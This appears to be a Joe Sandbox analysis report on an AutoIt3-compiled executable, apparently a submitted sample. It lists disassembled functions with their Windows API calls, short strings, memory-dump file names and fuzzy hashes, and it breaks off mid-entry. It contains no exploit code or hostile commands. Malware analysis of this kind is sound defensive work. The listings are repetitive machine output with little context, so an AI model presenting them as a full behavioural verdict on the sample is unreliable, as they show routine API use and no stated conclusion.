Opcode ID: 5d99ab0dc0e992955abb94fb8f1201d517503a02e663b91c8e0570689c5403c4
Instruction ID: d39adbb04156abde28e2fd193ad1df3a70c6c121ca921c4531acbc87affbc658
Opcode Fuzzy Hash: 5d99ab0dc0e992955abb94fb8f1201d517503a02e663b91c8e0570689c5403c4
Instruction Fuzzy Hash: 7B019272909625BBCB32EFB49A05B6DBB60BF04715F15800AF824B7690CB347942CFD6

Function 00A37A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00A37AD8

Part of subcall function 00A37CF4: __mtinitlocknum.LIBCMT ref: 00A37D06
Part of subcall function 00A37CF4: EnterCriticalSection.KERNEL32(00000000,?,00A37ADD,0000000D), ref: 00A37D1F

InterlockedIncrement.KERNEL32(?), ref: 00A37AE5
__lock.LIBCMT ref: 00A37AF9
___addlocaleref.LIBCMT ref: 00A37B17

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: d470052d73447d709d3b184a108aced7cb6ea3914401f792dac325cd6f18bffc
Instruction ID: 1d5d046ad180bed9b3a70f605460eeaaf1a1ec735710cd7e95cec4c402103793
Opcode Fuzzy Hash: d470052d73447d709d3b184a108aced7cb6ea3914401f792dac325cd6f18bffc
Instruction Fuzzy Hash: 9F015BB1504B00AEDB31DF75CA0674AF7F0EF50325F20890EB49A972A0CB70A684CB41

Function 00A7E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7E33D
_memset.LIBCMT ref: 00A7E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AD3D00,00AD3D44), ref: 00A7E37B
CloseHandle.KERNEL32 ref: 00A7E38D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: e753c73a514c783db3b63ef6ddd2845050a6f5e2bbbf46346b6690c80bfc89d9
Instruction ID: ceed6433d4eb657455efeb84afa7edb325a62fa069e371f99d74bb2092790e1b
Opcode Fuzzy Hash: e753c73a514c783db3b63ef6ddd2845050a6f5e2bbbf46346b6690c80bfc89d9
Instruction Fuzzy Hash: D9F0E9F22013007FE70097A0AC05F773F5DD704754F004822FE49DA1A2D7755D014AA5

Function 00A7EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A2AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00A2AFE3
Part of subcall function 00A2AF83: SelectObject.GDI32(?,00000000), ref: 00A2AFF2
Part of subcall function 00A2AF83: BeginPath.GDI32(?), ref: 00A2B009
Part of subcall function 00A2AF83: SelectObject.GDI32(?,00000000), ref: 00A2B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A7EA8E
LineTo.GDI32(00000000,?,?), ref: 00A7EA9B
EndPath.GDI32(00000000), ref: 00A7EAAB
StrokePath.GDI32(00000000), ref: 00A7EAB9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8f1a50d4b5c434b5037d9f5813b82ba273a3fdd7ff658e1ccbc113e17535d915
Instruction ID: 47909ca9edda21d448e366e9eccb13f3fb52d590ff2b04b0045f92afa70268ad
Opcode Fuzzy Hash: 8f1a50d4b5c434b5037d9f5813b82ba273a3fdd7ff658e1ccbc113e17535d915
Instruction Fuzzy Hash: F1F0E932101254BBDB12DFD4AD0DFCE3F15AF05311F048102FA02610E187749553CB95

Function 00A4C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A4C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4C85D
GetCurrentThreadId.KERNEL32 ref: 00A4C864
AttachThreadInput.USER32(00000000), ref: 00A4C86B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1a018717e60bd0a8dd5eaf5d542f3de6b5d7c2d67fbe2f813615b6d25901cc2b
Instruction ID: 0c17cbc4592db9b27be42411b942c81c641b3f4740e60713e136c4af8b8beb80
Opcode Fuzzy Hash: 1a018717e60bd0a8dd5eaf5d542f3de6b5d7c2d67fbe2f813615b6d25901cc2b
Instruction Fuzzy Hash: 1CE0657524222876DB105FA1DC0DEDB7F1CEF457B1F008012B60D85450DA71C5C1C7E0

Function 00A4B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00A4B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,00A4AC9D), ref: 00A4B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A4AC9D), ref: 00A4B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,00A4AC9D), ref: 00A4B0F1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: afe405c08ee1bf40a730d42e1e2a26461f2e73e52142d315994dd2fb1cc3e072
Instruction ID: ac66239b69143cc9ee520c90ca4abc1de2b1e8aa1777904d24401b706fc7a470
Opcode Fuzzy Hash: afe405c08ee1bf40a730d42e1e2a26461f2e73e52142d315994dd2fb1cc3e072
Instruction Fuzzy Hash: 8EE086367012119BD7209FF55D0CB473BA8EF95792F118819F242DA040EF748482C760

Function 00A2B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A2B496
SetTextColor.GDI32(?,000000FF), ref: 00A2B4A0
SetBkMode.GDI32(?,00000001), ref: 00A2B4B5
GetStockObject.GDI32(00000005), ref: 00A2B4BD
GetWindowDC.USER32(?,00000000), ref: 00A8DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A8DE38
GetPixel.GDI32(00000000,?,00000000), ref: 00A8DE51
GetPixel.GDI32(00000000,00000000,?), ref: 00A8DE6A
GetPixel.GDI32(00000000,?,?), ref: 00A8DE8A
ReleaseDC.USER32(?,00000000), ref: 00A8DE95

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 04d4f63409ba768258208534cdabc36df2700cf0f45915ba757fae36d02b6e07
Instruction ID: 0dd22b3ed1e4cbbf209edf45bb5cdf4f88dd51815094ee1993cef531f3a7b690
Opcode Fuzzy Hash: 04d4f63409ba768258208534cdabc36df2700cf0f45915ba757fae36d02b6e07
Instruction Fuzzy Hash: 0FE0ED32200240ABDB21ABA8EC49BD83F11AB51335F14C767F7A9580E1CB714582DB11

Function 00A8B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A8B29A
GetDC.USER32(00000000), ref: 00A8B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A8B2C3
ReleaseDC.USER32 ref: 00A8B2E2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3a7a4065717a5c9dafe8031fadcbf44930087ac1aefcee5d4a6a6c1431cd7bb8
Instruction ID: 9dc36b2a28eeee2df29f37323630b69e957f730af3a2d205a75a4c8300af9081
Opcode Fuzzy Hash: 3a7a4065717a5c9dafe8031fadcbf44930087ac1aefcee5d4a6a6c1431cd7bb8
Instruction Fuzzy Hash: 62E04FB1210204EFDB009FB0D84866D7BB4EB4C360F11C81AFE5A87211DF7498828B50

Function 00A4B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A4B2DF
UnloadUserProfile.USERENV(?,?), ref: 00A4B2EB
CloseHandle.KERNEL32(?), ref: 00A4B2F4
CloseHandle.KERNEL32(?), ref: 00A4B2FC

Part of subcall function 00A4AB24: GetProcessHeap.KERNEL32(00000000,?,00A4A848), ref: 00A4AB2B
Part of subcall function 00A4AB24: HeapFree.KERNEL32(00000000), ref: 00A4AB32

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 436e9f571cd399a26add5f57eccaadece92cedfe3df0af26b57b46157cc24878
Instruction ID: 32d58ad9a3e7a4e20c101ac77747974bbbef011ccf7fa4f37e81659ba5c79202
Opcode Fuzzy Hash: 436e9f571cd399a26add5f57eccaadece92cedfe3df0af26b57b46157cc24878
Instruction Fuzzy Hash: 96E0463A204405BFDB016FE5EC08859FF76FF993213108622F61595575CF3298B2EB51

Function 00A8B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A8B2AE
GetDC.USER32(00000000), ref: 00A8B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A8B2C3
ReleaseDC.USER32 ref: 00A8B2E2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7dbed4d08fc4f348badb1c510331a24f3cb4cf651b51d432aad93348e76f7aa2
Instruction ID: 0b1647b378055bb3680b9ea4126420209c3327fca912fe95653e854cf81d233c
Opcode Fuzzy Hash: 7dbed4d08fc4f348badb1c510331a24f3cb4cf651b51d432aad93348e76f7aa2
Instruction Fuzzy Hash: 46E046B1600200EFDB009FB0D84866DBBB8EB4C360F11881AFA5A8B211CF7898828B00

Function 00A4DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00A4DEAA

Strings

Container, xrefs: 00A4DE29
AutoIt3GUI, xrefs: 00A4DE22

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 20b4df7aac7d46c0429ce373415aa9e6537f33be91c5c38062c30e9c2143348b
Instruction ID: f5bde762643733a35c5c734faae3ce8dc693426e9637593edf159d06d8a7098a
Opcode Fuzzy Hash: 20b4df7aac7d46c0429ce373415aa9e6537f33be91c5c38062c30e9c2143348b
Instruction Fuzzy Hash: F7912974600601AFDB24DF64C885F6ABBF5BF89710F10896EF94ACB691DB70E841CB60

Function 00A2BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A2BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00A2BCF3

Strings

@, xrefs: 00A2BCE8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 1cf19f9af5c0f57023fea9167544267c31040f72324670e4c8b70d5583d7885d
Instruction ID: 6d4bbe1ae36dc545c37a87214d639810218dfe597cdab9b50ba9aaae7fde4514
Opcode Fuzzy Hash: 1cf19f9af5c0f57023fea9167544267c31040f72324670e4c8b70d5583d7885d
Instruction Fuzzy Hash: 13512571408744ABE320AF58EC86BAFBBECFF94354F41485EF1C8411A6DF7085A98766

Function 00A5C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00A144ED: __fread_nolock.LIBCMT ref: 00A1450B

_wcscmp.LIBCMT ref: 00A5C65D
_wcscmp.LIBCMT ref: 00A5C670

Strings

FILE, xrefs: 00A5C5A5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 172b276f63894cab23d8a0018d8140babe6dbeae762da8bfe35c5eab24fabd94
Instruction ID: c6cfde713f768f7392c3286eeffb7716749808bdc672218e9bccf21d6929cde7
Opcode Fuzzy Hash: 172b276f63894cab23d8a0018d8140babe6dbeae762da8bfe35c5eab24fabd94
Instruction Fuzzy Hash: 0941D372A0020ABFDF209BA8DD41FEF77B9AF49714F000469FA05FB181D6759A498B61

Function 00A7A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A7A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A7A86F

Strings

', xrefs: 00A7A7C3

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 29b603e3c3ccc6de8df40270e239ffbbd344052449e2c9bd76c10dac72f26eaa
Instruction ID: 823dc10cc0f1df23aa757ec51b820922f90268205122f0344e426ecbc6c9edb4
Opcode Fuzzy Hash: 29b603e3c3ccc6de8df40270e239ffbbd344052449e2c9bd76c10dac72f26eaa
Instruction Fuzzy Hash: 5841EB75A01309AFDB14CF68D981BDE7BB9FB58300F14816AE909EB341D770A942CF91

Function 00A65180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A65190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00A651C6

Strings

|, xrefs: 00A651B5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 68398eae50077e75d35f87a5ea5d9901054562a3aa6567cb9741fc5df5d3d54e
Instruction ID: 7d9447eab70673e6e1d396aa9201434c31f9050dd974f2945af9732f9d0550f7
Opcode Fuzzy Hash: 68398eae50077e75d35f87a5ea5d9901054562a3aa6567cb9741fc5df5d3d54e
Instruction Fuzzy Hash: 20310371C00119ABCF01EFA4CD85EEEBFB9FF18750F100119F815A6166EB31AA56DBA0

Function 00A7975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A7980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A7984A

Strings

static, xrefs: 00A797AA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: dae52d4154430a025dad5b29095f5f4cd04531ea7d442d7b6f9484d90c4d864d
Instruction ID: 1dd1d2269032c32496b25d95f462ceedbbb77ef4a7a6e852823cdd8e06569d78
Opcode Fuzzy Hash: dae52d4154430a025dad5b29095f5f4cd04531ea7d442d7b6f9484d90c4d864d
Instruction Fuzzy Hash: B8316D71110604AAEB10DF68DC80BBB73A9FF59760F00C61AF9A9C7190DB31AC91C7A0

Function 00A55157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A551C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A55201

Strings

0, xrefs: 00A551BF

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2ccdeffa1eaf4195664bf9dd42444c9363537964a7fd5c8ad84999624eddf5d7
Instruction ID: e01c80335f030357cea108e9410f44c6f8869f05937b67fb274ce3f632e11ccf
Opcode Fuzzy Hash: 2ccdeffa1eaf4195664bf9dd42444c9363537964a7fd5c8ad84999624eddf5d7
Instruction Fuzzy Hash: A631A531E00704ABEB24DFA9D955BEEBBF4BF55351F144029ED85AA1A0E7709948CB10

Function 00A6658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00A66608

Strings

, $, xrefs: 00A66648
AUTOITCALLVARIABLE%d, xrefs: 00A665FA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 90ffa54080f965162103fd1d4e8af974def7a82e43729376ac6e01afc6321785
Instruction ID: f1940da90ce4f655be135d2ac05fb81d2b4bf2caacf14e27c48e042d2e79f101
Opcode Fuzzy Hash: 90ffa54080f965162103fd1d4e8af974def7a82e43729376ac6e01afc6321785
Instruction Fuzzy Hash: BE219E75A00218BFCF15EFA4D982EEEB7B4BF49700F014459F405AB181DB70EA85CBA5

Function 00A793CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A7945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A79467

Strings

Combobox, xrefs: 00A79429

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
